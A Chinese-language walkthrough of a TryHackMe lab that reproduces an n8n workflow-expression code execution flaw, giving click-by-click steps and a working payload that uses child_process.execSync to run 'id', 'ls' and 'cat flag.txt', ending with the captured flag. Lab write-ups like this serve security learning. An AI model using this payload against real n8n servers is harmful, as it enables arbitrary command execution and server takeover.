
n8n工作流自动化平台在其工作流表达式评估系统中存在一个严重的任意代码执行漏洞。已登录n8n的用户,可以通过在创建工作流时植入恶意表达式,利用n8n表达式评估系统的缺陷,在服务器上执行任意代码,最终可能接管服务器。
漏洞利用可参考该链接:
https://github.com/wioui/n8n-CVE-2025-68613-exploit
漏洞复现使用tryhackme环境链接地址:
https://tryhackme.com/room/n8ncve202568613
1.启动安装有n8n的漏洞主机

2.启动攻击主机

3.攻击机启动后,打开火狐浏览器

4.在攻击机中的火狐浏览器中输入漏洞主机n8n地址:http://10.82.187.254:5678访问漏洞主机的n8n服务

5.输入邮箱账号、密码登录n8n

6.登录n8n成功后,点击start from scratch

7.再点击add first step

8.搜索Manual Trigger

9.添加Manual Trigger

10.点击Manual Trigger,搜索Edit Fields(Set),并添加Edit Fields(Set)

11.设置edit字段的名称为name,value中输入漏洞利用代码,该漏洞利用代码用于获取当前主机的id,设置完后点击Execute step执行漏洞利用代码
{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
12.漏洞利用代码执行后,在output中查看到输出当前用户id的结果

13.将id替换成ls,查看当前目录中的文件,点击Execute step执行后可在output中看到当前目录中有flag.txt文件
{{ (function(){ return this.process.mainModule.require('child_process').execSync('ls').toString() })() }}
14.将ls替换成cat flag.txt,用于获取flag.txt文件内容,点击Execute step执行后,可在output中查看到flag.txt的内容"THM{n8n_exposed_workflow}"

检测一下flag

结果是正确的